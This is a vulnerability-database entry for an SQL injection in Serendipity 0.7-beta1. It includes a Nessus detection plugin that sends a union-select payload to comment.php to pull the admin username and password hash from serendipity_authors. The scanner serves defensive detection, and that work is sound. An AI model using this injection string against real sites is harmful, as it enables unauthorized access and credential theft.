Vulnerabilities > CVE-2004-2158 - Input Validation vulnerability in S9Y Serendipity 0.7Beta1

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL

Summary

SQL injection vulnerability in Serendipity 0.7-beta1 allows remote attackers to execute arbitrary SQL commands via the entry_id parameter to (1) exit.php or (2) comment.php.

Vulnerable Configurations

Part Description Count
Application
S9Y
1

Exploit-Db

description: Serendipity 0.7-beta1 SQL Injection Proof of Concept. CVE-2004-2158. Webapps exploit for php platform
id: EDB-ID:561
last seen: 2016-01-31
modified: 2004-09-28
published: 2004-09-28
reporter: aCiDBiTS
source: https://www.exploit-db.com/download/561/
title: Serendipity 0.7-beta1 SQL Injection Proof of Concept

Nessus

NASL family: CGI abuses
NASL id: SERENDIPITY_SQL.NASL
description: The remote version of Serendipity is vulnerable to SQL injection issues due to a failure of the application to properly sanitize user-supplied input. An attacker may exploit this flaw to issue arbitrary statements in the remote database, and therefore bypass authorization or even overwrite arbitrary files on the remote system. In addition, the comment.php script is vulnerable to a cross-site scripting attack.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 14842
published: 2004-09-28
reporter: This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/14842
title: Serendipity < 0.7.0beta3 Multiple Vulnerabilities
code:
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 # Plugin registration. This branch runs only when the Nessus engine loads
 # the plugin to read its metadata; the actual check is further down.
 script_id(14842);
 script_version ("1.24");

 # Two CVEs are attached: CVE-2004-2158 is the entry_id SQL injection; the
 # other one presumably covers the comment.php cross-site scripting flaw
 # named in the description below - verify against the advisory.
 script_cve_id("CVE-2004-2157", "CVE-2004-2158");
 script_bugtraq_id(11269);

 script_name(english:"Serendipity < 0.7.0beta3 Multiple Vulnerabilities");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains PHP scripts that are prone to SQL
injection and a cross-site scripting attack." );
 script_set_attribute(attribute:"description", value:
"The remote version of Serendipity is vulnerable to SQL injection
issues due to a failure of the application to properly sanitize user-
supplied input.

An attacker may exploit this flaw to issue arbitrary statements in the
remote database, and therefore, bypass authorization or even overwrite
arbitrary files on the remote system

In addition, the comment.php script is vulnerable to a cross-site
scripting attack." );
  # http://lists.grok.org.uk/pipermail/full-disclosure/2004-September/026955.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?face78e6" );
 script_set_attribute(attribute:"see_also", value:"https://docs.s9y.org/" );
 # The fix is an upgrade; there is no configuration workaround recorded here.
 script_set_attribute(attribute:"solution", value:
"Upgrade to Serendipity 0.7.0beta3 or later." );
 # CVSS2 base 7.5: network-reachable, low complexity, unauthenticated,
 # partial C/I/A - matches the score shown on the advisory page.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 # NOTE(review): exploit_available is "false" although the temporal vector
 # above says E:POC and a public proof of concept exists for this CVE
 # (Exploit-DB entry 561); the two statements should be reconciled.
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2004/09/28");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/09/28");
 script_cvs_date("Date: 2018/11/15 20:50:18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:s9y:serendipity");
script_end_attributes();


 script_summary(english:"Checks for SQL injection vulnerability in Serendipity");

 # ACT_ATTACK: the check sends a crafted request rather than reading a
 # version banner, so it is skipped when CGI scanning is disabled (see
 # script_exclude_keys below).
 script_category(ACT_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 # Relies on the detection plugin having stored the install location under
 # the www/serendipity KB key; the check exits early when it is absent.
 script_dependencies("serendipity_detect.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);
 script_require_keys("www/serendipity");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

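port = get_http_port(default:80);
# Nothing to test unless the server can run PHP at all.
if (!can_host_php(port:port)) exit(0);


# Install location recorded by serendipity_detect.nasl; the KB value has the
# form "<version> under <path>" and only the path part is needed here.
install = get_kb_item(string("www/", port, "/serendipity"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (isnull(matches)) exit(0);
loc = matches[2];

# Request the trackback view of comment.php with the published
# CVE-2004-2158 proof-of-concept entry_id value; on a vulnerable install the
# page renders data from the authors table in the "Weblog" field.
w = http_send_recv3(method:"GET", item:string(loc, "/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20--"), port:port);
if (isnull(w)) exit(1, "The web server did not answer");
# http_send_recv3() returns [status line, headers, body]; only the body is inspected.
r = w[2];

# All three signals must be present before reporting:
#  1. the trackback page rendered ("Weblog" appears at all),
#  2. the "Weblog:" field holds at least one hex digit, i.e. a hash-like
#     value was substituted in - the pattern used to be [a-f0-9]*, which also
#     matched an empty field and so contributed no evidence of injection,
#  3. the injected SQL fragment is echoed back in the page.
if (
 "Weblog" >< r &&
 egrep(pattern:"<b>Weblog: </b> [a-f0-9]+<br />", string:r) &&
 "0 and 0 union select 1,2,3,4,username,password,7,8,9,0,1,2,3 from serendipity_authors where authorid=1" >< r
) {
 security_hole(port);
 # Mark the host so other plugins can see an SQL injection was confirmed.
 set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
}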